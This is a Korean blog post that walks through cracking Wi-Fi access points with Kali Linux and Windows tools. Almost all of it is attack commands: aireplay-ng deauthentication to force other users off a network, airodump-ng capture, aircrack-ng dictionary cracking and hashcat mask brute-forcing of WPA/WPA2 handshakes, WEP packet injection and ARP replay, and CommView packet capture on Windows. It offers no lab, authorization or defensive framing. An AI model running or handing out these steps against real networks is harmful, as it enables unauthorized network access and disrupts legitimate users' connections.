Hack/No filtered

Kali linux를 이용한 AP 해킹 (+windows)

Jaden.. 2021. 1. 12. 09:42

iwconfig

ifconfig wlan0 down

 

[모니터 모드 전환]

airmon-ng check kill : 모드 전환 시 간섭 발생 가능성이 있는 프로세스 종료

 

airmon-ng start wlan0

 

iwconfig

 

[주변 무선랜 스캔]

airodump-ng wlan0mon

 

[타겟 설정]

airodump-ng wlan0mon --channel 3 --bssid [bssid] -w [filename]

 

[강제로 다른 사용자 연결 해제]

aireplay-ng 0 [인증 해제 횟수] -a [AP의 MAC주소] -c [접속한 장비의 MAC주소]

 

[사전 대입, wpa wpa2]

aircrack-ng wpacrack-01.cap -w /usr/share/wordlists/sqlmap.txt


[hashcat 사용]

cap 파일을 hccapx로 확장자 변환

#cap2hccapx.bin [cap file] [hccapx file]

#hashcat -m 2500 -a 3 --force [hccapx file] 0000?d?d?d?d

 : "wpa2로 암호화되어있으며, 0000뒤에 숫자4글자인 비밀번호를 bruteforce해라." 라는 의미

 

기존에 나온 결과 값을 참고하기 위해 --show 옵션 사용 가능


[wep 사용시]

aireplay-ng wlan0mon -1 0 -a [ap 맥주소] -h [랜카드 맥주소] : 패킷인젝션

aireplay-ng wlan0mon -3 -b [ap 맥주소] -h [랜카드 맥주소] :  apr request replay 다량의 패킷 유발

 

data 35000개 이상 모은 후에

aircrack-ng -b [AP 맥주소] [cap file] 실행

안되면 5000개씩 data를 자동으로 더모으고 크랙을 시도함


[windows 환경]

- commview for wifi 설치

- logging 설정 : auto_saving, 200000, 100

- 재생버튼 클릭

- 타겟 설정후 single channel mode로 변경

- 무료버전이므로 위 과정을 수차례 시도하여 데이터 수집

- Log Viewer에서 local commView logs 로드

- export log에서 wireshark tcp dump로 pcap 파일로 변경

>aircrack-ng.exe

index number 입력하면 crack!!

>aircrack-ng.exe -w [password.lst] [name.cap]